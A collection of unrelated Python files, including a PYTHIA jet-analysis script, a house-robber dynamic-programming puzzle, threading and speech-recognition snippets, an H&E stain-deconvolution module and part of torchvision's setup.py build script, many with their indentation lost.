getattr(self, 'hResponse_JetPt_R%s' % R_label).Fill(jp.pt(), jch.pt())
'''
if 60 <= jch.pt() < 80:
getattr(self, 'hNconstit_Pt_ch_PtBinCH60-80_R%s' % R_label).Fill(
jch.pt(), len(jch.constituents()))
getattr(self, 'hNconstit_Pt_h_PtBinCH60-80_R%s' % R_label).Fill(
jh.pt(), len(jh.constituents()))
getattr(self, 'hNconstit_Pt_p_PtBinCH60-80_R%s' % R_label).Fill(
jp.pt(), len(jp.constituents()))
'''
# Fill observable histograms and response matrices
for alpha in self.alpha_list:
self.fill_RMs(jetR, alpha, jp, jh, jch)
#---------------------------------------------------------------
# Fill jet response matrices
#---------------------------------------------------------------
def fill_RMs(self, jetR, alpha, jp, jh, jch):
for obs in self.observable_list:
for i in range(len(self.obs_settings[obs])):
obs_setting = self.obs_settings[obs][i]
grooming_setting = self.obs_grooming_settings[obs][i]
obs_label = self.utils.obs_label(obs_setting, grooming_setting)
label = ("R%s_%s" % (jetR, obs_label)).replace('.', '')
jp_sd, jh_sd, jch_sd = None, None, None
if grooming_setting:
gshop_p = fjcontrib.GroomerShop(jp, jetR, self.reclustering_algorithm)
jp_sd = self.utils.groom(gshop_p, grooming_setting, jetR).pair()
gshop_h = fjcontrib.GroomerShop(jh, jetR, self.reclustering_algorithm)
jh_sd = self.utils.groom(gshop_h, grooming_setting, jetR).pair()
gshop_ch = fjcontrib.GroomerShop(jch, jetR, self.reclustering_algorithm)
jch_sd = self.utils.groom(gshop_ch, grooming_setting, jetR).pair()
obs_p, obs_h, obs_ch = None, None, None
# Calculate angularities
if obs == "ang":
alpha = obs_setting
kappa = 1
if grooming_setting:
obs_p = fjext.lambda_beta_kappa(jp, jp_sd, alpha, kappa, jetR)
obs_h = fjext.lambda_beta_kappa(jh, jh_sd, alpha, kappa, jetR)
obs_ch = fjext.lambda_beta_kappa(jch, jch_sd, alpha, kappa, jetR)
else:
obs_p = fjext.lambda_beta_kappa(jp, alpha, kappa, jetR)
obs_h = fjext.lambda_beta_kappa(jh, alpha, kappa, jetR)
obs_ch = fjext.lambda_beta_kappa(jch, alpha, kappa, jetR)
# Jet mass histograms
elif obs == "mass":
if grooming_setting:
# Untagged jets -- record underflow value
obs_p = jp_sd.m() if jp_sd.has_constituents() else -1
obs_h = jh_sd.m() if jh_sd.has_constituents() else -1
obs_ch = jch_sd.m() if jch_sd.has_constituents() else -1
else:
obs_p = jp.m()
obs_h = jh.m()
obs_ch = jch.m()
else:
raise ValueError("Observable not implemented in fill_unmatched_histograms")
for level in ['p', 'h', 'ch']:
if self.level in [None, level]:
getattr(self, 'h_%s_JetPt_%s_%sScaled' % (obs, level, label)).Fill(jch.pt(), locals()['obs_'+level])
if self.level == None:
getattr(self, 'hResponse_%s_%sScaled' % (obs, label)).Fill(obs_p, obs_ch)
'''
# Lambda at p-vs-ch-level for various bins in ch jet pT
if 20 <= jch.pt() < 40:
getattr(self, 'hResponse_%s_PtBinCH20-40_%sScaled' % (obs, label)).Fill(lp, lch)
elif 40 <= jch.pt() < 60:
getattr(self, 'hResponse_%s_PtBinCH40-60_%sScaled' % (obs, label)).Fill(lp, lch)
elif 60 <= jch.pt() < 80:
getattr(self, 'hResponse_%s_PtBinCH60-80_%sScaled' % (obs, label)).Fill(lp, lch)
# Phase space plots and annulus histograms, including those binned in ch jet pT
num_r = self.annulus_plots_num_r
ang_per_r_ch = [0] * num_r
for particle in jch.constituents():
deltaR = particle.delta_R(jch)
getattr(self, 'hPhaseSpace_DeltaR_Pt_ch_%sScaled' % (obs, label)).Fill(
particle.pt(), deltaR / jetR)
lambda_i = lambda_beta_kappa_i(particle, jch, jetR, alpha, 1)
getattr(self, 'hPhaseSpace_%s_DeltaR_ch_%sScaled' % (obs, label)).Fill(deltaR / jetR, lambda_i)
getattr(self, 'hPhaseSpace_%s_Pt_ch_%sScaled' % (obs, label)).Fill(particle.pt(), lambda_i)
if 60 <= jch.pt() < 80:
getattr(self, 'hPhaseSpace_DeltaR_Pt_ch_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
particle.pt(), deltaR / jetR)
getattr(self, 'hPhaseSpace_%s_DeltaR_ch_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
deltaR / jetR, lambda_i)
getattr(self, 'hPhaseSpace_%s_Pt_ch_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
particle.pt(), lambda_i)
ang_per_r_ch = [ang_per_r_ch[i] + lambda_i *
(deltaR <= ((i+1) * jetR * self.annulus_plots_max_x / num_r))
for i in range(0, num_r, 1)]
ang_per_r_p = [0] * num_r
for particle in jp.constituents():
deltaR = particle.delta_R(jp)
getattr(self, 'hPhaseSpace_DeltaR_Pt_p_%sScaled' % (obs, label)).Fill(
particle.pt(), deltaR / jetR)
lambda_i = lambda_beta_kappa_i(particle, jp, jetR, alpha, 1)
getattr(self, 'hPhaseSpace_%s_DeltaR_p_%sScaled' % (obs, label)).Fill(deltaR / jetR, lambda_i)
getattr(self, 'hPhaseSpace_%s_Pt_p_%sScaled' % (obs, label)).Fill(particle.pt(), lambda_i)
if 60 <= jch.pt() < 80:
getattr(self, 'hPhaseSpace_DeltaR_Pt_p_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
particle.pt(), deltaR / jetR)
getattr(self, 'hPhaseSpace_%s_DeltaR_p_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
deltaR / jetR, lambda_i)
getattr(self, 'hPhaseSpace_%s_Pt_p_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
particle.pt(), lambda_i)
ang_per_r_p = [ang_per_r_p[i] + lambda_i *
(deltaR <= ((i+1) * jetR * self.annulus_plots_max_x / num_r))
for i in range(0, num_r, 1)]
for i in range(0, num_r, 1):
getattr(self, 'hAnnulus_%s_p_%sScaled' % (obs, label)).Fill(
(i+1) * self.annulus_plots_max_x / num_r, ang_per_r_p[i] / (lp + 1e-11))
getattr(self, 'hAnnulus_%s_ch_%sScaled' % (obs, label)).Fill(
(i+1) * self.annulus_plots_max_x / num_r, ang_per_r_ch[i] / (lch + 1e-11))
if 60 <= jch.pt() < 80:
getattr(self, 'hAnnulus_%s_p_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
(i+1) * self.annulus_plots_max_x / num_r, ang_per_r_p[i] / (lp + 1e-11))
getattr(self, 'hAnnulus_%s_ch_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
(i+1) * self.annulus_plots_max_x / num_r, ang_per_r_ch[i] / (lch + 1e-11))
'''
# Residual plots (with and without divisor in y-axis)
getattr(self, "h_%sDiff_JetPt_%sScaled" % (obs, label)).Fill(jch.pt(), obs_p - obs_ch)
if obs_p: # prevent divide by 0
getattr(self, "h_%sResidual_JetPt_%sScaled" % (obs, label)).Fill(jp.pt(), (obs_p - obs_ch) / obs_p)
# 4D response matrices for "forward folding" to ch level
x = ([jch.pt(), jp.pt(), obs_ch, obs_p])
x_array = array('d', x)
getattr(self, 'hResponse_JetPt_%s_ch_%sScaled' % (obs, label)).Fill(x_array)
x = ([jh.pt(), jp.pt(), obs_h, obs_p])
x_array = array('d', x)
getattr(self, 'hResponse_JetPt_%s_h_%sScaled' % (obs, label)).Fill(x_array)
#---------------------------------------------------------------
# Fill jet histograms for MPI (which are just the H-->CH RMs)
#---------------------------------------------------------------
def fill_jet_histograms_MPI(self, jetR, jp, jh, jch):
for obs in self.observable_list:
for i in range(len(self.obs_settings[obs])):
obs_setting = self.obs_settings[obs][i]
grooming_setting = self.obs_grooming_settings[obs][i]
        obs_label = self.utils.obs_label(obs_setting, grooming_setting)
        label = ("R%s_%s" % (jetR, obs_label)).replace('.', '')
jp_sd, jh_sd, jch_sd = None, None, None
if grooming_setting:
gshop_p = fjcontrib.GroomerShop(jp, jetR, self.reclustering_algorithm)
jp_sd = self.utils.groom(gshop_p, grooming_setting, jetR).pair()
gshop_h = fjcontrib.GroomerShop(jh, jetR, self.reclustering_algorithm)
jh_sd = self.utils.groom(gshop_h, grooming_setting, jetR).pair()
gshop_ch = fjcontrib.GroomerShop(jch, jetR, self.reclustering_algorithm)
jch_sd = self.utils.groom(gshop_ch, grooming_setting, jetR).pair()
obs_p, obs_h, obs_ch = None, None, None
# Calculate angularities
if obs == "ang":
alpha = obs_setting
kappa = 1
if grooming_setting:
obs_p = fjext.lambda_beta_kappa(jp, jp_sd, alpha, kappa, jetR)
obs_h = fjext.lambda_beta_kappa(jh, jh_sd, alpha, kappa, jetR)
obs_ch = fjext.lambda_beta_kappa(jch, jch_sd, alpha, kappa, jetR)
else:
obs_p = fjext.lambda_beta_kappa(jp, alpha, kappa, jetR)
obs_h = fjext.lambda_beta_kappa(jh, alpha, kappa, jetR)
obs_ch = fjext.lambda_beta_kappa(jch, alpha, kappa, jetR)
# Jet mass histograms
elif obs == "mass":
if grooming_setting:
# Untagged jets -- record underflow value
obs_p = jp_sd.m() if jp_sd.has_constituents() else -1
obs_h = jh_sd.m() if jh_sd.has_constituents() else -1
obs_ch = jch_sd.m() if jch_sd.has_constituents() else -1
else:
obs_p = jp.m()
obs_h = jh.m()
obs_ch = jch.m()
else:
raise ValueError("Observable not implemented in fill_unmatched_histograms")
# 4D response matrices for "forward folding" from h to ch level
x = ([jch.pt(), jh.pt(), obs_ch, obs_h])
x_array = array('d', x)
getattr(self, 'hResponse_JetPt_%s_Fnp_%sScaled' % (obs, label)).Fill(x_array)
#---------------------------------------------------------------
# Initiate scaling of all histograms and print final simulation info
#---------------------------------------------------------------
def scale_print_final_info(self, pythia, pythia_MPI):
# Scale all jet histograms by the appropriate factor from generated cross section
# and the number of accepted events
if not self.no_scale:
scale_f = pythia.info.sigmaGen() / self.hNevents.GetBinContent(1)
print("Weight MPIoff histograms by (cross section)/(N events) =", scale_f)
MPI_scale_f = pythia_MPI.info.sigmaGen() / self.hNeventsMPI.GetBinContent(1)
print("Weight MPIon histograms by (cross section)/(N events) =", MPI_scale_f)
self.scale_jet_histograms(scale_f, MPI_scale_f)
print()
print("N total final MPI-off events:", int(self.hNevents.GetBinContent(1)), "with",
int(pythia.info.nAccepted() - self.hNevents.GetBinContent(1)),
"events rejected at hadronization step")
self.hNevents.SetBinError(1, 0)
for jetR in self.jetR_list:
jetR_str = str(jetR).replace('.', '')
count1 = getattr(self, "count1_R%s" % jetR_str)
count2 = getattr(self, "count2_R%s" % jetR_str)
print(("For R=%s: %i jets cut at first match criteria; " + \
"%i jets cut at second match criteria.") %
(str(jetR), count1, count2))
print()
#---------------------------------------------------------------
# Scale all jet histograms by sigma/N
#---------------------------------------------------------------
def scale_jet_histograms(self, scale_f, MPI_scale_f):
for jetR in self.jetR_list:
hist_list_name = "hist_list_R%s" % str(jetR).replace('.', '')
for h in getattr(self, hist_list_name):
h.Scale(scale_f)
hist_list_MPIon_name = "hist_list_MPIon_R%s" % str(jetR).replace('.', '')
for h in getattr(self, hist_list_MPIon_name):
h.Scale(MPI_scale_f)
################################################################
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='pythia8 fastjet on the fly',
prog=os.path.basename(__file__))
pyconf.add_standard_pythia_args(parser)
# Could use --py-seed
parser.add_argument('--user-seed', help='PYTHIA starting seed', default=1111, type=int)
parser.add_argument('-o', '--output-dir', action='store', type=str, default='./',
help='Output directory for generated ROOT file(s)')
parser.add_argument('--tree-output-fname', default="AnalysisResults.root", type=str,
help="Filename for the (unscaled) generated particle ROOT TTree")
parser.add_argument('--no-tree', default=False, action='store_true',
help="Do not save tree of particle information, only create histograms")
parser.add_argument('--no-match-level', help="Save simulation for only one level with " + \
"no matching. Options: 'p', 'h', 'ch'", default=None, type=str)
parser.add_argument('--no-scale', help="Turn off rescaling all histograms by cross section / N",
action='store_true', default=False)
parser.add_argument('-c', '--config_file', action='store', type=str, default='config/angularity.yaml',
help="Path of config file for observable configurations")
args = parser.parse_args()
if args.no_match_level not in [None, 'p', 'h', 'ch']:
print("ERROR: Unrecognized type %s. Please use 'p', 'h', or 'ch'" % args.type_only)
exit(1)
# If invalid configFile is given, exit
if not os.path.exists(args.config_file):
    print('File \"{0}\" does not exist! Exiting!'.format(args.config_file))
sys.exit(0)
# Use PYTHIA seed for event generation
if args.user_seed < 0:
args.user_seed = 1111
# Have at least 1 event
if args.nev < 1:
args.nev = 1
if args.py_noMPI:
print("\033[91m%s\033[00m" % "WARNING: py-noMPI flag ignored for this program")
time.sleep(3)
print()
process = pythia_parton_hadron(config_file=args.config_file, output_dir=args.output_dir, args=args)
process.pythia_parton_hadron(args)
|
'''
You are a professional robber planning to rob houses along a street. Each house has a certain amount of money stashed. All houses at this place are arranged in a circle. That means the first house is the neighbor of the last one. Meanwhile, adjacent houses have security system connected and it will automatically contact the police if two adjacent houses were broken into on the same night.
Given a list of non-negative integers representing the amount of money of each house, determine the maximum amount of money you can rob tonight without alerting the police.
Example 1:
Input: [2,3,2]
Output: 3
Explanation: You cannot rob house 1 (money = 2) and then rob house 3 (money = 2),
because they are adjacent houses.
Example 2:
Input: [1,2,3,1]
Output: 4
Explanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).
Total amount you can rob = 1 + 3 = 4.
'''
class Solution:
def robRec(self,nums,index,memo):
if index>=len(nums):
return 0
if memo[index]!=-1:
return memo[index]
if index==len(nums)-1:
memo[index]=nums[index]
if index==len(nums)-2:
memo[index]=max(nums[index:])
else:
memo[index]=max(self.robRec(nums,index+2,memo)+nums[index],self.robRec(nums,index+1,memo))
return memo[index]
    def rob(self, nums):
        """
        :type nums: List[int]
        :rtype: int
        """
        if not nums:
            return 0
        if len(nums) <= 2:
            return max(nums)
        index = 0
        memo1 = [-1] * len(nums)
        memo2 = [-1] * len(nums)
        # Circular street: either rob house 0 (then the last house is excluded)
        # or skip house 0 and consider houses 1..n-1.
        return max(self.robRec(nums[:-1], index + 2, memo1) + nums[index],
                   self.robRec(nums, index + 1, memo2))
|
'''
Using the time module, create two functions,
call them one after another,
and measure the total running time.
'''
import time
import _thread as thread
def loop1():
    # ctime gives the current time
print('S loop 1 at: ',time.ctime())
    # how long to sleep, in seconds
time.sleep(4)
print('E loop 1 at :',time.ctime())
def loop2():
    # ctime gives the current time
print('S loop 2 at: ', time.ctime())
    # how long to sleep, in seconds
time.sleep(2)
print('E loop 2 at :', time.ctime())
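# Sketch (not part of the original script): the docstring above asks for the total
# running time, but start_new_thread returns immediately, so 'all done' prints
# before either loop finishes. One way to actually measure the elapsed time is to
# use the higher-level threading module and join both threads; with sleeps of 4 s
# and 2 s running concurrently, this reports roughly 4 s.
import threading
def timed_main():
    start = time.time()
    t1 = threading.Thread(target=loop1)
    t2 = threading.Thread(target=loop2)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    print('total elapsed: %.1f s' % (time.time() - start))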
def main():
print('S at: ',time.ctime())
    # Starting a thread here means running a given function in a new thread
    # The function that starts a new thread is start_new_thread
    # It takes two arguments: the function to run, and its arguments as a tuple (use an empty tuple if there are none)
    # Note: if the function takes only one argument, the tuple still needs a trailing comma
thread.start_new_thread(loop1,())
thread.start_new_thread(loop2, ())
print('all done at: ',time.ctime())
if __name__ == '__main__':
main()
while True:
time.sleep(1)
|
#!/usr/bin/env python3
# coding: utf-8
import os.path
import sys
sys.path.insert(0, os.path.abspath(os.path.join(__file__, "..", "..")))
import lglass.tools.roagen
if __name__ == "__main__":
lglass.tools.roagen.main()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 1 18:06:19 2020
@author: Attitude
"""
# Audio To Text (Speech Recognition)
# Import Library
import os
import speech_recognition as sr
sr.__version__
# Speech Recognition starts here
r = sr.Recognizer()
current_dir = os.path.dirname(os.path.realpath(__file__))
test_dir = os.path.join(current_dir, 'test_sound_mono')
fp = os.path.join(test_dir, 'datang_2.wav')
aud = sr.AudioFile(fp)
with aud as source:
audio = r.record(source)
print(r.recognize_google(audio))
# This is for checking audio variable type
print(type(audio))
|
# -*- coding: utf-8 -*-
#############################################################################
# Copyright Vlad Popovici <popovici@bioxlab.org>
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#############################################################################
#
# QPATH.STAIN.HE: stain deconvolution for H&E
#
from __future__ import (absolute_import, division, print_function, unicode_literals)
__author__ = "Vlad Popovici <popovici@bioxlab.org>"
__version__ = 0.1
__all__ = ['rgb2he', 'rgb2he_macenko']
import numpy as np
from scipy.linalg import eig
from skimage.exposure import rescale_intensity
def rgb2he(img):
"""Stain separation for H&E slides: estimate the H- and E- signal intensity
and the residuals.
Args:
img (numpy.ndarray): a H x W x 3 image array
Returns:
3 numpy arrays of size H x W with signal scaled to [0,1] corresponding
        to estimated intensities of Haematoxylin, Eosin and background/residual
components.
"""
# This implementation follows http://web.hku.hk/~ccsigma/color-deconv/color-deconv.html
assert (img.ndim == 3)
assert (img.shape[2] == 3)
height, width, _ = img.shape
img = -np.log((img + 1.0) / img.max())
D = np.array([[ 1.92129515, 1.00941672, -2.34107612],
[-2.34500192, 0.47155124, 2.65616872],
[ 1.21495282, -0.99544467, 0.2459345 ]])
rgb = img.swapaxes(2, 0).reshape((3, height*width))
heb = np.dot(D, rgb)
res_img = heb.reshape((3, width, height)).swapaxes(0, 2)
return rescale_intensity(res_img[:,:,0], out_range=(0,1)), \
rescale_intensity(res_img[:,:,1], out_range=(0,1)), \
rescale_intensity(res_img[:,:,2], out_range=(0,1))
def rgb2he_macenko(img, D=None, alpha=1.0, beta=0.15, white=255.0,
return_deconvolution_matrix=False):
"""
Performs stain separation from RGB images using the method in
M Macenko, et al. "A method for normalizing histology slides for quantitative analysis",
IEEE ISBI, 2009. dx.doi.org/10.1109/ISBI.2009.5193250
Args:
img (numpy.ndarray): RGB input image
D (numpy.ndarray): a deconvolution matrix. If None, one will be computed from the image
alpha (float): tolerance for pseudo-min/-max
beta (float): OD threshold for transparent pixels
white (float): white level (in each channel)
return_deconvolution_matrix (bool): if True, the deconvolution matrix is also returned
Returns:
three 2d arrays for H-, E- and remainder channels, respectively.
If return_deconvolution_matrix is True, the deconvolution matrix is also returned.
"""
assert (img.ndim == 3)
assert (img.shape[2] == 3)
I = img.reshape((img.shape[0] * img.shape[1], 3))
OD = -np.log((I + 1.0) / white) # optical density
if D is None:
# the deconvolution matrix is not provided so one has to be estimated from the
# image
rows = (OD >= beta).all(axis=1)
if not any(rows):
# no rows with all pixels above the threshold
raise RuntimeError('optical density below threshold')
ODhat = OD[rows, :] # discard transparent pixels
        u, V = eig(np.cov(ODhat.T))  # eigenvalues, eigenvectors
idx = np.argsort(u) # get a permutation to sort eigenvalues increasingly
V = V[:, idx] # sort eigenvectors
theta = np.dot(ODhat, V[:, 1:3]) # project optical density onto the eigenvectors
# corresponding to the largest eigenvalues
phi = np.arctan2(theta[:,1], theta[:,0])
min_phi, max_phi = np.percentile(phi, [alpha, 100.0-alpha], axis=None)
u1 = np.dot(V[:,1:3], np.array([[np.cos(min_phi)],[np.sin(min_phi)]]))
u2 = np.dot(V[:,1:3], np.array([[np.cos(max_phi)],[np.sin(max_phi)]]))
if u1[0] > u2[0]:
D = np.hstack((u1, u2)).T
else:
D = np.hstack((u2, u1)).T
D = np.vstack((D, np.cross(D[0,],D[1,])))
D = D / np.reshape(np.repeat(np.linalg.norm(D, axis=1), 3), (3,3), order=str('C'))
img_res = np.linalg.solve(D.T, OD.T).T
img_res = np.reshape(img_res, img.shape, order=str('C'))
if not return_deconvolution_matrix:
D = None
return rescale_intensity(img_res[:,:,0], out_range=(0, 1)), \
rescale_intensity(img_res[:,:,1], out_range=(0,1)), \
rescale_intensity(img_res[:,:,2], out_range=(0,1)), \
D
# end rgb2he_macenko
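# Minimal usage sketch (not part of the original module): run rgb2he on a small
# synthetic RGB tile just to illustrate the expected output shapes; the random
# array is only a stand-in for a real H&E image.
if __name__ == '__main__':
    _demo = (np.random.rand(64, 64, 3) * 255).astype(np.float64)
    _h, _e, _bg = rgb2he(_demo)
    print(_h.shape, _e.shape, _bg.shape)  # each (64, 64), values rescaled to [0, 1]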
|
from NIDAQ_1 import *
from NIDAQ_2 import *
from NIDAQ_3 import *
from NIDAQ_4 import *
from Coefficient import *
def Chan_1(points=CHUNK):
SetupTask1()
StartTask1()
data = ReadSamples1(points)
StopAndClearTask1()
return data
def Chan_2(points=CHUNK):
SetupTask2()
StartTask2()
data = ReadSamples2(points)
StopAndClearTask2()
return data
def Chan_3(points=CHUNK):
SetupTask3()
StartTask3()
data = ReadSamples3(points)
StopAndClearTask3()
return data
def Chan_4(points=CHUNK):
SetupTask4()
StartTask4()
data = ReadSamples4(points)
StopAndClearTask4()
return data
|
import distutils.command.clean
import distutils.spawn
import glob
import os
import shutil
import subprocess
import sys
import torch
from pkg_resources import DistributionNotFound, get_distribution, parse_version
from setuptools import find_packages, setup
from torch.utils.cpp_extension import BuildExtension, CppExtension, CUDA_HOME, CUDAExtension
def read(*names, **kwargs):
with open(os.path.join(os.path.dirname(__file__), *names), encoding=kwargs.get("encoding", "utf8")) as fp:
return fp.read()
def get_dist(pkgname):
try:
return get_distribution(pkgname)
except DistributionNotFound:
return None
cwd = os.path.dirname(os.path.abspath(__file__))
version_txt = os.path.join(cwd, "version.txt")
with open(version_txt) as f:
version = f.readline().strip()
sha = "Unknown"
package_name = "torchvision"
try:
sha = subprocess.check_output(["git", "rev-parse", "HEAD"], cwd=cwd).decode("ascii").strip()
except Exception:
pass
if os.getenv("BUILD_VERSION"):
version = os.getenv("BUILD_VERSION")
elif sha != "Unknown":
version += "+" + sha[:7]
def write_version_file():
version_path = os.path.join(cwd, "torchvision", "version.py")
with open(version_path, "w") as f:
f.write(f"__version__ = '{version}'\n")
f.write(f"git_version = {repr(sha)}\n")
f.write("from torchvision.extension import _check_cuda_version\n")
f.write("if _check_cuda_version() > 0:\n")
f.write(" cuda = _check_cuda_version()\n")
pytorch_dep = "torch"
if os.getenv("PYTORCH_VERSION"):
pytorch_dep += "==" + os.getenv("PYTORCH_VERSION")
requirements = [
"numpy",
"requests",
pytorch_dep,
]
# Excluding 8.3.* because of https://github.com/pytorch/vision/issues/4934
pillow_ver = " >= 5.3.0, !=8.3.*"
pillow_req = "pillow-simd" if get_dist("pillow-simd") is not None else "pillow"
requirements.append(pillow_req + pillow_ver)
def find_library(name, vision_include):
this_dir = os.path.dirname(os.path.abspath(__file__))
build_prefix = os.environ.get("BUILD_PREFIX", None)
is_conda_build = build_prefix is not None
library_found = False
conda_installed = False
lib_folder = None
include_folder = None
library_header = f"{name}.h"
# Lookup in TORCHVISION_INCLUDE or in the package file
package_path = [os.path.join(this_dir, "torchvision")]
for folder in vision_include + package_path:
candidate_path = os.path.join(folder, library_header)
library_found = os.path.exists(candidate_path)
if library_found:
break
if not library_found:
print(f"Running build on conda-build: {is_conda_build}")
if is_conda_build:
# Add conda headers/libraries
if os.name == "nt":
build_prefix = os.path.join(build_prefix, "Library")
include_folder = os.path.join(build_prefix, "include")
lib_folder = os.path.join(build_prefix, "lib")
library_header_path = os.path.join(include_folder, library_header)
library_found = os.path.isfile(library_header_path)
conda_installed = library_found
else:
# Check if using Anaconda to produce wheels
conda = shutil.which("conda")
is_conda = conda is not None
print(f"Running build on conda: {is_conda}")
if is_conda:
python_executable = sys.executable
py_folder = os.path.dirname(python_executable)
if os.name == "nt":
env_path = os.path.join(py_folder, "Library")
else:
env_path = os.path.dirname(py_folder)
lib_folder = os.path.join(env_path, "lib")
include_folder = os.path.join(env_path, "include")
library_header_path = os.path.join(include_folder, library_header)
library_found = os.path.isfile(library_header_path)
conda_installed = library_found
if not library_found:
if sys.platform == "linux":
library_found = os.path.exists(f"/usr/include/{library_header}")
library_found = library_found or os.path.exists(f"/usr/local/include/{library_header}")
return library_found, conda_installed, include_folder, lib_folder
def get_extensions():
this_dir = os.path.dirname(os.path.abspath(__file__))
extensions_dir = os.path.join(this_dir, "torchvision", "csrc")
main_file = glob.glob(os.path.join(extensions_dir, "*.cpp")) + glob.glob(
os.path.join(extensions_dir, "ops", "*.cpp")
)
source_cpu = (
glob.glob(os.path.join(extensions_dir, "ops", "autograd", "*.cpp"))
+ glob.glob(os.path.join(extensions_dir, "ops", "cpu", "*.cpp"))
+ glob.glob(os.path.join(extensions_dir, "ops", "quantized", "cpu", "*.cpp"))
)
source_mps = glob.glob(os.path.join(extensions_dir, "ops", "mps", "*.mm"))
print("Compiling extensions with following flags:")
force_cuda = os.getenv("FORCE_CUDA", "0") == "1"
print(f" FORCE_CUDA: {force_cuda}")
force_mps = os.getenv("FORCE_MPS", "0") == "1"
print(f" FORCE_MPS: {force_mps}")
debug_mode = os.getenv("DEBUG", "0") == "1"
print(f" DEBUG: {debug_mode}")
use_png = os.getenv("TORCHVISION_USE_PNG", "1") == "1"
print(f" TORCHVISION_USE_PNG: {use_png}")
use_jpeg = os.getenv("TORCHVISION_USE_JPEG", "1") == "1"
print(f" TORCHVISION_USE_JPEG: {use_jpeg}")
use_nvjpeg = os.getenv("TORCHVISION_USE_NVJPEG", "1") == "1"
print(f" TORCHVISION_USE_NVJPEG: {use_nvjpeg}")
use_ffmpeg = os.getenv("TORCHVISION_USE_FFMPEG", "1") == "1"
print(f" TORCHVISION_USE_FFMPEG: {use_ffmpeg}")
use_video_codec = os.getenv("TORCHVISION_USE_VIDEO_CODEC", "1") == "1"
print(f" TORCHVISION_USE_VIDEO_CODEC: {use_video_codec}")
nvcc_flags = os.getenv("NVCC_FLAGS", "")
print(f" NVCC_FLAGS: {nvcc_flags}")
is_rocm_pytorch = False
if torch.__version__ >= "1.5":
from torch.utils.cpp_extension import ROCM_HOME
is_rocm_pytorch = (torch.version.hip is not None) and (ROCM_HOME is not None)
if is_rocm_pytorch:
from torch.utils.hipify import hipify_python
hipify_python.hipify(
project_directory=this_dir,
output_directory=this_dir,
includes="torchvision/csrc/ops/cuda/*",
show_detailed=True,
is_pytorch_extension=True,
)
source_cuda = glob.glob(os.path.join(extensions_dir, "ops", "hip", "*.hip"))
# Copy over additional files
for file in glob.glob(r"torchvision/csrc/ops/cuda/*.h"):
shutil.copy(file, "torchvision/csrc/ops/hip")
else:
source_cuda = glob.glob(os.path.join(extensions_dir, "ops", "cuda", "*.cu"))
source_cuda += glob.glob(os.path.join(extensions_dir, "ops", "autocast", "*.cpp"))
sources = main_file + source_cpu
extension = CppExtension
define_macros = []
extra_compile_args = {"cxx": []}
if (torch.cuda.is_available() and ((CUDA_HOME is not None) or is_rocm_pytorch)) or force_cuda:
extension = CUDAExtension
sources += source_cuda
if not is_rocm_pytorch:
define_macros += [("WITH_CUDA", None)]
if nvcc_flags == "":
nvcc_flags = []
else:
nvcc_flags = nvcc_flags.split(" ")
else:
define_macros += [("WITH_HIP", None)]
nvcc_flags = []
extra_compile_args["nvcc"] = nvcc_flags
elif torch.backends.mps.is_available() or force_mps:
sources += source_mps
if sys.platform == "win32":
define_macros += [("torchvision_EXPORTS", None)]
define_macros += [("USE_PYTHON", None)]
extra_compile_args["cxx"].append("/MP")
if debug_mode:
print("Compiling in debug mode")
extra_compile_args["cxx"].append("-g")
extra_compile_args["cxx"].append("-O0")
if "nvcc" in extra_compile_args:
# we have to remove "-OX" and "-g" flag if exists and append
nvcc_flags = extra_compile_args["nvcc"]
extra_compile_args["nvcc"] = [f for f in nvcc_flags if not ("-O" in f or "-g" in f)]
extra_compile_args["nvcc"].append("-O0")
extra_compile_args["nvcc"].append("-g")
else:
print("Compiling with debug mode OFF")
extra_compile_args["cxx"].append("-g0")
sources = [os.path.join(extensions_dir, s) for s in sources]
include_dirs = [extensions_dir]
ext_modules = [
extension(
"torchvision._C",
sorted(sources),
include_dirs=include_dirs,
define_macros=define_macros,
extra_compile_args=extra_compile_args,
)
]
# ------------------- Torchvision extra extensions ------------------------
vision_include = os.environ.get("TORCHVISION_INCLUDE", None)
vision_library = os.environ.get("TORCHVISION_LIBRARY", None)
vision_include = vision_include.split(os.pathsep) if vision_include is not None else []
vision_library = vision_library.split(os.pathsep) if vision_library is not None else []
include_dirs += vision_include
library_dirs = vision_library
# Image reading extension
image_macros = []
image_include = [extensions_dir]
image_library = []
image_link_flags = []
if sys.platform == "win32":
image_macros += [("USE_PYTHON", None)]
# Locating libPNG
libpng = shutil.which("libpng-config")
pngfix = shutil.which("pngfix")
png_found = libpng is not None or pngfix is not None
use_png = use_png and png_found
if use_png:
print("Found PNG library")
if libpng is not None:
# Linux / Mac
min_version = "1.6.0"
png_version = subprocess.run([libpng, "--version"], stdout=subprocess.PIPE)
png_version = png_version.stdout.strip().decode("utf-8")
png_version = parse_version(png_version)
if png_version >= parse_version(min_version):
print("Building torchvision with PNG image support")
png_lib = subprocess.run([libpng, "--libdir"], stdout=subprocess.PIPE)
png_lib = png_lib.stdout.strip().decode("utf-8")
if "disabled" not in png_lib:
image_library += [png_lib]
png_include = subprocess.run([libpng, "--I_opts"], stdout=subprocess.PIPE)
png_include = png_include.stdout.strip().decode("utf-8")
_, png_include = png_include.split("-I")
image_include += [png_include]
image_link_flags.append("png")
print(f" libpng version: {png_version}")
print(f" libpng include path: {png_include}")
else:
print("Could not add PNG image support to torchvision:")
print(f" libpng minimum version {min_version}, found {png_version}")
use_png = False
else:
# Windows
png_lib = os.path.join(os.path.dirname(os.path.dirname(pngfix)), "lib")
png_include = os.path.join(os.path.dirname(os.path.dirname(pngfix)), "include", "libpng16")
image_library += [png_lib]
image_include += [png_include]
image_link_flags.append("libpng")
else:
print("Building torchvision without PNG image support")
image_macros += [("PNG_FOUND", str(int(use_png)))]
# Locating libjpeg
